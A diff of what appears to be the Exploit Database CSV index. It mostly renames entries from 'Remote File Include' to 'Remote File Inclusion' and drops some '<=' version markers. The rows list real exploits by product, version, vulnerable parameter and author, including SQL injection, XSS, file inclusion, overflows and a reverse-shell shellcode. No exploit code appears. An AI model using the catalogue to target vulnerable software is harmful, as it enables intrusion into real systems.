db/DataReaderWriter.php CONFIG_DB Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28872,platforms/php/webapps/28872.txt,"Actionpoll 1.1.1 db/PollDB.php CONFIG_DATAREADERWRITER Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28873,platforms/php/webapps/28873.txt,"Exhibit Engine 1.22 fetchsettings.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28874,platforms/php/webapps/28874.txt,"Exhibit Engine 1.22 fstyles.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 -28875,platforms/php/webapps/28875.txt,"Freenews 1.1 Aff_News.php Remote File Include",2006-10-30,MoHaNdKo,php,webapps,0 +28875,platforms/php/webapps/28875.txt,"Freenews 1.1 Aff_News.php Remote File Inclusion",2006-10-30,MoHaNdKo,php,webapps,0 28876,platforms/windows/remote/28876.htm,"Microsoft Internet Explorer 6.0 - Unspecified Code Execution (1)",2006-10-30,"Michal Bucko",windows,remote,0 28877,platforms/windows/remote/28877.htm,"Microsoft Internet Explorer 6.0 - Unspecified Code Execution (2)",2006-10-30,"Michal Bucko",windows,remote,0 28878,platforms/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 login.php username Parameter SQL Injection",2006-10-30,poplix,asp,webapps,0 @@ -25918,23 +25918,23 @@ id,file,description,date,author,platform,type,port 28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 RemoveChild Denial of Service",2006-10-30,"Wojciech H",windows,dos,0 28881,platforms/php/webapps/28881.txt,"Foresite CMS Index_2.php Cross-Site Scripting",2006-10-30,"David Vieira-Kurz",php,webapps,0 28882,platforms/php/webapps/28882.txt,"phpFaber CMS 1.3.36 Htmlarea.php Cross-Site Scripting",2005-10-30,Vigilon,php,webapps,0 -28883,platforms/php/webapps/28883.txt,"Easy Web Portal 2.1.2 - Multiple Remote File Include Vulnerabilities",2006-10-31,MEFISTO,php,webapps,0 +28883,platforms/php/webapps/28883.txt,"Easy Web Portal 2.1.2 - Multiple Remote File Inclusion Vulnerabilities",2006-10-31,MEFISTO,php,webapps,0 28884,platforms/windows/remote/28884.html,"BlooMooWeb 1.0.9 - ActiveX Control - Multiple Vulnerabilities",2006-10-31,maxgipeh,windows,remote,0 28885,platforms/php/webapps/28885.php,"PHP-Nuke 7.x Journal Module Search.php SQL Injection",2006-10-31,Paisterist,php,webapps,0 -28886,platforms/php/webapps/28886.txt,"The Search Engine Project 0.942 Configfunction.php Remote File Include",2006-10-30,"Cyber Security",php,webapps,0 +28886,platforms/php/webapps/28886.txt,"The Search Engine Project 0.942 Configfunction.php Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28887,platforms/java/remote/28887.txt,"Sun Java System 6.x Messenger Express Cross-Site Scripting",2006-10-31,Handrix,java,remote,0 28888,platforms/hardware/remote/28888.txt,"ECI Telecom B-Focus ADSL2+ Combo332+ Wireless Router Information Disclosure",2006-10-31,LegendaryZion,hardware,remote,0 28889,platforms/php/webapps/28889.txt,"Netquery 4.0 NQUser.php Cross-Site Scripting",2006-10-31,"Tal Argoni",php,webapps,0 28890,platforms/php/webapps/28890.txt,"iPlanet Messaging Server Messenger Express Expression() HTML Injection",2006-10-31,LegendaryZion,php,webapps,0 28891,platforms/php/webapps/28891.txt,"Mirapoint Web Mail Expression() HTML Injection",2006-10-31,LegendaryZion,php,webapps,0 -28892,platforms/php/webapps/28892.txt,"RSSonate Project_Root Parameter Remote File Include",2006-11-01,Arab4services,php,webapps,0 -28893,platforms/php/webapps/28893.pl,"KnowledgeBuilder 2.2 visEdit_Control.Class.php Remote File Include",2006-11-08,igi,php,webapps,0 +28892,platforms/php/webapps/28892.txt,"RSSonate Project_Root Parameter Remote File Inclusion",2006-11-01,Arab4services,php,webapps,0 +28893,platforms/php/webapps/28893.pl,"KnowledgeBuilder 2.2 visEdit_Control.Class.php Remote File Inclusion",2006-11-08,igi,php,webapps,0 28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service",2006-11-01,"Matousec Transparent security",windows,dos,0 28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double Free Denial of Service",2006-11-02,LMH,linux,dos,0 28896,platforms/php/webapps/28896.txt,"RunCMS 1.x Avatar Arbitrary File Upload",2006-11-02,securfrog,php,webapps,0 28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 - MHTML Denial of Service",2006-11-02,"Positive Technologies",windows,dos,0 28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 Index.php SQL Injection",2006-11-02,Spiked,php,webapps,0 -28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 Class.Database.php Remote File Include",2006-11-07,navairum,php,webapps,0 +28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 Class.Database.php Remote File Inclusion",2006-11-07,navairum,php,webapps,0 28900,platforms/php/webapps/28900.txt,"ac4p Mobile index.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28901,platforms/php/webapps/28901.txt,"ac4p Mobile MobileNews.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28902,platforms/php/webapps/28902.txt,"ac4p Mobile - polls.php Multiple Parameter XSS (1)",2006-11-03,AL-garnei,php,webapps,0 @@ -25943,11 +25943,11 @@ id,file,description,date,author,platform,type,port 28905,platforms/php/webapps/28905.txt,"ac4p Mobile cp/index.php pagenav Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 BlogID Parameter - Multiple SQL Injection Vulnerabilities",2006-11-03,"Benjamin Moss",php,webapps,0 28907,platforms/php/webapps/28907.txt,"Simplog 0.9.3 Archive.php PID Parameter Cross-Site Scripting",2006-11-03,"Benjamin Moss",php,webapps,0 -28908,platforms/php/webapps/28908.txt,"Advanced GuestBook 2.3.1 Admin.php Remote File Include",2006-11-03,BrokeN-ProXy,php,webapps,0 +28908,platforms/php/webapps/28908.txt,"Advanced GuestBook 2.3.1 Admin.php Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0 28909,platforms/php/webapps/28909.txt,"IF-CMS Index.php Cross-Site Scripting",2006-11-04,"Benjamin Moss",php,webapps,0 28910,platforms/php/webapps/28910.pl,"PHPKit 1.6.1 Popup.php SQL Injection",2006-11-04,x23,php,webapps,0 28911,platforms/solaris/dos/28911.txt,"Sun Solaris 10 UFS Local Denial of Service",2006-11-04,LMH,solaris,dos,0 -28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 Install.php3 - Remote File Include",2006-11-06,Mahmood_ali,php,webapps,0 +28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 Install.php3 - Remote File Inclusion",2006-11-06,Mahmood_ali,php,webapps,0 28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 NewList.php Cross-Site Scripting",2006-11-06,CvIr.System,php,webapps,0 28915,platforms/php/webapps/28915.txt,"Article Script 1.6.3 RSS.php SQL Injection",2006-11-06,Liz0ziM,php,webapps,0 28916,platforms/windows/remote/28916.rb,"America Online ICQ 5.1 - ActiveX Control Remote Code Execution",2006-11-06,"Peter Vreugdenhil",windows,remote,0 @@ -25975,12 +25975,12 @@ id,file,description,date,author,platform,type,port 28937,platforms/php/webapps/28937.txt,"AIOCP 1.3.x cp_show_page_help.php Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0 28938,platforms/php/webapps/28938.txt,"IPManager 2.3 Index.php Cross-Site Scripting",2006-11-07,spaceballyopsolo,php,webapps,0 28939,platforms/php/webapps/28939.txt,"Kayako SupportSuite 3.0.32 Index.php Cross-Site Scripting",2006-11-07,Dr.HAiL,php,webapps,0 -28940,platforms/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 Languages.Lib.php Local File Include",2006-11-08,ajann,php,webapps,0 +28940,platforms/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 Languages.Lib.php Local File Inclusion",2006-11-08,ajann,php,webapps,0 28941,platforms/asp/webapps/28941.txt,"Immediacy .NET CMS 5.2 Logon.ASPX Cross-Site Scripting",2006-11-08,"Gemma Hughes",asp,webapps,0 28942,platforms/php/webapps/28942.txt,"FreeWebshop 2.1/2.2 index.php page Parameter Traversal Arbitrary File Access",2006-11-08,"laurent gaffie",php,webapps,0 28943,platforms/php/webapps/28943.txt,"FreeWebshop 2.1/2.2 index.php cat Parameter XSS",2006-11-08,"laurent gaffie",php,webapps,0 28944,platforms/php/webapps/28944.txt,"Abarcar Realty Portal 5.1.5/6.0.1 - Multiple SQL Injection Vulnerabilities",2006-11-08,"Benjamin Moss",php,webapps,0 -28945,platforms/php/webapps/28945.txt,"PHPMyChat Plus 1.9 - Multiple Local File Include Vulnerabilities",2006-11-08,ajann,php,webapps,0 +28945,platforms/php/webapps/28945.txt,"PHPMyChat Plus 1.9 - Multiple Local File Inclusion Vulnerabilities",2006-11-08,ajann,php,webapps,0 28946,platforms/php/webapps/28946.txt,"Portix-PHP 0.4.2 - Multiple SQL Injection Vulnerabilities",2006-11-08,"Benjamin Moss",php,webapps,0 28947,platforms/php/webapps/28947.txt,"Speedywiki 2.0/2.1 - Multiple Input Validation Vulnerabilities",2006-11-08,"laurent gaffie",php,webapps,0 28948,platforms/osx/dos/28948.c,"Apple Mac OS X 10.x FPathConf System Call Local Denial of Service",2006-11-09,"ilja van sprundel",osx,dos,0 @@ -26001,7 +26001,7 @@ id,file,description,date,author,platform,type,port 28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28966,platforms/php/webapps/28966.txt,"Drake CMS 0.2 Index.php Cross-Site Scripting",2006-11-10,CorryL,php,webapps,0 -28967,platforms/php/webapps/28967.txt,"ExoPHPdesk 1.2 Pipe.php Remote File Include",2006-11-11,Firewall1954,php,webapps,0 +28967,platforms/php/webapps/28967.txt,"ExoPHPdesk 1.2 Pipe.php Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0 28968,platforms/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent ActiveX Control Overflow",2013-10-15,blake,windows,remote,0 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - SEH Buffer Overflow",2013-10-15,metacom,windows,local,0 28970,platforms/php/webapps/28970.txt,"Dexs PM System WordPress Plugin - Authenticated Persistent XSS (0Day)",2013-10-15,TheXero,php,webapps,80 @@ -26014,7 +26014,7 @@ id,file,description,date,author,platform,type,port 28977,platforms/ios/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 28978,platforms/ios/webapps/28978.txt,"Apple iOS 7.0.2 - Sim Lock Screen Display Bypass",2013-10-15,Vulnerability-Lab,ios,webapps,0 28979,platforms/linux/webapps/28979.txt,"DornCMS Application 1.4 - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,linux,webapps,0 -28980,platforms/php/webapps/28980.txt,"WordPress 2.0.5 Functions.php - Remote File Include",2006-11-11,_ANtrAX_,php,webapps,0 +28980,platforms/php/webapps/28980.txt,"WordPress 2.0.5 Functions.php - Remote File Inclusion",2006-11-11,_ANtrAX_,php,webapps,0 28981,platforms/multiple/remote/28981.txt,"IBM WebSphere 6.0 Faultactor Cross-Site Scripting",2006-11-13,"Nuri Fattah",multiple,remote,0 28982,platforms/php/webapps/28982.txt,"cPanel 10 seldir.html dir Parameter XSS",2006-11-13,"Aria-Security Team",php,webapps,0 28983,platforms/php/webapps/28983.txt,"cPanel 10 newuser.html Multiple Parameter XSS",2006-11-13,"Aria-Security Team",php,webapps,0 @@ -26036,7 +26036,7 @@ id,file,description,date,author,platform,type,port 29153,platforms/asp/webapps/29153.txt,"JiRos Link Manager 1.0 viewlinks.asp CategoryID Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 29154,platforms/asp/webapps/29154.txt,"CreaDirectory 1.2 - search.asp category Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 29155,platforms/asp/webapps/29155.txt,"CreaDirectory 1.2 addlisting.asp cat Parameter XSS",2006-11-21,"laurent gaffie",asp,webapps,0 -28998,platforms/php/webapps/28998.txt,"Phpdebug 1.1 Debug_test.php Remote File Include",2006-11-12,Firewall,php,webapps,0 +28998,platforms/php/webapps/28998.txt,"Phpdebug 1.1 Debug_test.php Remote File Inclusion",2006-11-12,Firewall,php,webapps,0 28999,platforms/php/webapps/28999.txt,"DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS",2006-11-12,"Aria-Security Team",php,webapps,0 29000,platforms/php/webapps/29000.txt,"DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS",2006-11-12,"Aria-Security Team",php,webapps,0 29001,platforms/php/webapps/29001.txt,"DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS",2006-11-12,"Aria-Security Team",php,webapps,0 @@ -26135,7 +26135,7 @@ id,file,description,date,author,platform,type,port 29094,platforms/asp/webapps/29094.txt,"Texas Rankem tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 List.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0 29096,platforms/windows/remote/29096.rb,"NetGear MA521 Wireless Driver 5.148.724 Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0 -29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin Index.php Remote File Include",2006-11-20,S.W.A.T.,php,webapps,0 +29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin Index.php Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0 29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - /admin/admincore.php msg Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 29099,platforms/php/webapps/29099.txt,"BirdBlog 1.4 - /admin/comments.php month Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 29100,platforms/php/webapps/29100.txt,"BirdBlog 1.4 - /admin/entries.php month Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 @@ -26202,7 +26202,7 @@ id,file,description,date,author,platform,type,port 29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 Keystone.EXE Local Denial of Service",2006-11-23,Hessam-x,windows,dos,0 29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional File Handling Buffer Overflow",2006-11-23,LSsec.com,windows,remote,0 29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 HTMLMARQ.OCX Library Denial of Service",2006-11-22,"Michal Bucko",windows,dos,0 -29173,platforms/php/webapps/29173.txt,"Active PHP Bookmarks 1.1.2 - APB_SETTINGS['apb_path'] Multiple Remote File Include Vulnerabilities",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 +29173,platforms/php/webapps/29173.txt,"Active PHP Bookmarks 1.1.2 - APB_SETTINGS['apb_path'] Multiple Remote File Inclusion Vulnerabilities",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 29174,platforms/asp/webapps/29174.txt,"MidiCart ASP Item_Show.ASP ID2006quant Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29175,platforms/php/webapps/29175.txt,"Simple PHP Gallery 1.1 System SP_Index.php Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps,0 29176,platforms/asp/webapps/29176.txt,"ASP ListPics 5.0 Listpics.ASP SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 @@ -26281,7 +26281,7 @@ id,file,description,date,author,platform,type,port 29267,platforms/php/webapps/29267.txt,"ProNews 1.5 admin/change.php Multiple Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29268,platforms/php/webapps/29268.txt,"ProNews 1.5 lire-avis.php aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29269,platforms/php/webapps/29269.txt,"ProNews 1.5 lire-avis.php aa Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29270,platforms/php/webapps/29270.txt,"MXBB Profile Control Panel 0.91c Module Remote File Include",2006-12-09,bd0rk,php,webapps,0 +29270,platforms/php/webapps/29270.txt,"MXBB Profile Control Panel 0.91c Module Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0 29271,platforms/asp/webapps/29271.txt,"AppIntellect SpotLight CRM Login.ASP SQL Injection",2006-12-09,ajann,asp,webapps,0 29272,platforms/php/webapps/29272.txt,"CMS Made Simple 1.0.2 - SearchInput Cross-Site Scripting",2006-12-11,Nicokiller,php,webapps,0 29280,platforms/php/webapps/29280.txt,"GTX CMS 2013 Optima - SQL Injection",2013-10-29,Vulnerability-Lab,php,webapps,0 @@ -26293,7 +26293,7 @@ id,file,description,date,author,platform,type,port 29286,platforms/windows/dos/29286.txt,"Microsoft Windows Explorer explorer.exe WMV File Handling DoS",2006-12-15,shinnai,windows,dos,0 29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",windows,dos,0 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0 -29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 Fusion_Forum_View.php Local File Include",2006-12-16,Kacper,php,webapps,0 +29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 Fusion_Forum_View.php Local File Inclusion",2006-12-16,Kacper,php,webapps,0 29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 & < 5.4.2 - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 Haber.ASP SQL Injection",2006-12-16,ShaFuck31,asp,webapps,0 29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 Shout.php HTML Injection",2006-12-18,IMHOT3B,php,webapps,0 @@ -26330,7 +26330,7 @@ id,file,description,date,author,platform,type,port 29324,platforms/linux/remote/29324.rb,"Moodle Remote Command Execution",2013-10-31,Metasploit,linux,remote,80 29325,platforms/php/remote/29325.rb,"ProcessMaker Open Source Authenticated PHP Code Execution",2013-10-31,Metasploit,php,remote,80 29326,platforms/php/webapps/29326.txt,"Opsview pre 4.4.1 - Blind SQL Injection",2013-10-31,"J. Oquendo",php,webapps,80 -30207,platforms/asp/webapps/30207.txt,"FuseTalk <= 4.0 blog/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",asp,webapps,0 +30207,platforms/asp/webapps/30207.txt,"FuseTalk 4.0 blog/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",asp,webapps,0 30203,platforms/asp/webapps/30203.txt,"Comersus Cart 7.0.7 comersus_optReviewReadExec.asp id Parameter SQL Injection",2007-06-20,Doz,asp,webapps,0 30204,platforms/asp/webapps/30204.txt,"Comersus Cart 7.0.7 comersus_customerAuthenticateForm.asp redirectUrl XSS",2007-06-20,Doz,asp,webapps,0 30186,platforms/linux/remote/30186.txt,"Firebird SQL Fbserver 2.0 - Remote Buffer Overflow",2007-06-12,"Cody Pierce",linux,remote,0 @@ -26346,7 +26346,7 @@ id,file,description,date,author,platform,type,port 29339,platforms/php/webapps/29339.txt,"PHP Live! 3.2.2 setup/transcripts.php search_string Parameter XSS",2006-12-25,"Hackers Center Security",php,webapps,0 29340,platforms/php/webapps/29340.txt,"PHP Live! 3.2.2 index.php l Parameter XSS",2006-12-25,"Hackers Center Security",php,webapps,0 29341,platforms/php/webapps/29341.txt,"PHP Live! 3.2.2 phplive/message_box.php Multiple Parameter XSS",2006-12-25,"Hackers Center Security",php,webapps,0 -29342,platforms/php/webapps/29342.txt,"Luckybot 3 DIR Parameter Multiple Remote File Include Vulnerabilities",2006-12-26,Red_Casper,php,webapps,0 +29342,platforms/php/webapps/29342.txt,"Luckybot 3 DIR Parameter Multiple Remote File Inclusion Vulnerabilities",2006-12-26,Red_Casper,php,webapps,0 29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 include/class.parser_phpcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 @@ -26387,7 +26387,7 @@ id,file,description,date,author,platform,type,port 29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 shipping.php Multiple Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 admin/editcatalogue.php cat Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 admin/salesadmin.php resultpage Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 -29383,platforms/linux/remote/29383.txt,"Adobe Reader <= 9.1.3 Plugin Open Parameters Cross-Site Scripting",2007-01-03,"Stefano Di Paola",linux,remote,0 +29383,platforms/linux/remote/29383.txt,"Adobe Reader 9.1.3 Plugin Open Parameters Cross-Site Scripting",2007-01-03,"Stefano Di Paola",linux,remote,0 29384,platforms/php/webapps/29384.txt,"RI Blog 1.3 - Search.ASP Cross-Site Scripting",2007-01-05,ShaFuck31,php,webapps,0 29385,platforms/asp/webapps/29385.txt,"Kolayindir Download Down.ASP SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0 29387,platforms/windows/dos/29387.pl,"Plogue Sforzando 1.665 - (SEH) Buffer Overflow PoC",2013-11-03,"Mike Czumak",windows,dos,0 @@ -26441,8 +26441,8 @@ id,file,description,date,author,platform,type,port 29434,platforms/php/webapps/29434.txt,"Magic Photo Storage Website - user/user_membership_password.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29435,platforms/multiple/webapps/29435.txt,"Apache Tomcat 5.5.25 - CSRF Vulnerabilities",2013-11-04,"Ivano Binetti",multiple,webapps,0 29436,platforms/linux_mips/shellcode/29436.asm,"Linux/MIPS - (Little Endian) Reverse Shell (192.168.1.177:31337) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",linux_mips,shellcode,0 -29437,platforms/php/webapps/29437.txt,"Easy Banner Pro 2.8 info.php Remote File Include",2007-01-07,rUnViRuS,php,webapps,0 -29438,platforms/php/webapps/29438.txt,"Edit-X Edit_Address.php Remote File Include",2007-01-09,IbnuSina,php,webapps,0 +29437,platforms/php/webapps/29437.txt,"Easy Banner Pro 2.8 info.php Remote File Inclusion",2007-01-07,rUnViRuS,php,webapps,0 +29438,platforms/php/webapps/29438.txt,"Edit-X Edit_Address.php Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29439,platforms/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,multiple,remote,0 29441,platforms/osx/dos/29441.txt,"Apple Mac OS X 10.4.8 - DMG UFS FFS_MountFS Integer Overflow",2007-01-10,LMH,osx,dos,0 29442,platforms/php/webapps/29442.html,"phpBB 2.0.21 - Privmsg.php HTML Injection",2007-01-11,Demential,php,webapps,0 @@ -26519,20 +26519,20 @@ id,file,description,date,author,platform,type,port 30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Multiple Vulnerabilities",2007-05-16,"Chris Evans",linux,remote,0 30045,platforms/windows/remote/30045.html,"PrecisionID Barcode PrecisionID_Barcode.DLL ActiveX 1.9 Control Arbitrary File Overwrite",2007-05-16,shinnai,windows,remote,0 -30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup <= 11.5 mediasvr caloggerd Denial of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0 -30047,platforms/php/webapps/30047.txt,"VBulletin <= 3.6.6 Calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0 +30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup 11.5 mediasvr caloggerd Denial of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0 +30047,platforms/php/webapps/30047.txt,"VBulletin 3.6.6 Calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0 30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 ShopContent.ASP Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps,0 30049,platforms/windows/remote/30049.html,"LEADTOOLS Multimedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow",2007-05-17,shinnai,windows,remote,0 30050,platforms/php/webapps/30050.html,"Redoable 1.2 Theme header.php s Parameter XSS",2007-05-17,"John Martinelli",php,webapps,0 -30051,platforms/php/webapps/30051.txt,"PsychoStats <= 2.3 - Server.php Path Disclosure",2007-05-17,kefka,php,webapps,0 +30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - Server.php Path Disclosure",2007-05-17,kefka,php,webapps,0 30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0 30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 30054,platforms/jsp/webapps/30054.txt,"Sonicwall Gms 7.x - Filter Bypass & Persistent (0Day)",2013-12-05,Vulnerability-Lab,jsp,webapps,0 30055,platforms/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps,0 30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 Low.php Cross-Site Scripting",2007-06-18,RMx,php,webapps,0 -30156,platforms/cgi/webapps/30156.txt,"CGILua <= 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0 +30156,platforms/cgi/webapps/30156.txt,"CGILua 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0 30200,platforms/php/webapps/30200.txt,"PHP Hosting Biller 1.0 Index.php Cross-Site Scripting",2007-08-18,Serapis.net,php,webapps,0 -30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 Lang Cookie Parameter Local File Include",2007-05-08,netVigilance,php,webapps,0 +30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 Lang Cookie Parameter Local File Inclusion",2007-05-08,netVigilance,php,webapps,0 30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp Frameset-7.HTML Cross-Site Scripting",2007-05-08,"Michael Domberg",windows,remote,0 30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 - DOP Command Local Privilege Escalation",2007-05-08,"Daniele Calore",unix,local,0 30018,platforms/linux/remote/30018.py,"Python 2.5 PyLocale_strxfrm Function Remote Information Leak",2007-05-08,"Piotr Engelking",linux,remote,0 @@ -26545,7 +26545,7 @@ id,file,description,date,author,platform,type,port 30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0 30026,platforms/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 - Unspecified Directory Traversal",2007-05-11,"Digital Defense",windows,remote,0 30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 Web Mail HTML Injection",2007-05-12,"Alla Bezroutchko",php,webapps,0 -30028,platforms/php/webapps/30028.txt,"EQDKP <= 1.3.1 Show Variable Cross-Site Scripting",2007-05-12,kefka,php,webapps,0 +30028,platforms/php/webapps/30028.txt,"EQDKP 1.3.1 Show Variable Cross-Site Scripting",2007-05-12,kefka,php,webapps,0 30014,platforms/windows/local/30014.py,"Windows NDPROXY - Local SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0 29512,platforms/php/webapps/29512.txt,"Vanilla Forums 2.0 < 2.0.18.5 (class.utilitycontroller.php) - PHP Object Injection",2013-11-08,EgiX,php,webapps,80 29514,platforms/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection",2013-11-08,"High-Tech Bridge SA",php,webapps,80 @@ -26555,7 +26555,7 @@ id,file,description,date,author,platform,type,port 29518,platforms/hardware/webapps/29518.txt,"Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities",2013-11-08,"Oz Elisyan",hardware,webapps,80 29519,platforms/php/webapps/29519.txt,"Horde Groupware Web Mail Edition 5.1.2 - CSRF (2)",2013-11-08,"Marcela Benetrix",php,webapps,80 29520,platforms/linux/dos/29520.txt,"GTK2 GDKPixBufLoader - Remote Denial of Service",2007-01-24,"Lubomir Kundrak",linux,dos,0 -29521,platforms/php/webapps/29521.txt,"Virtual Host Administrator 0.1 Modules_Dir Remote File Include",2007-01-24,"Dr Max Virus",php,webapps,0 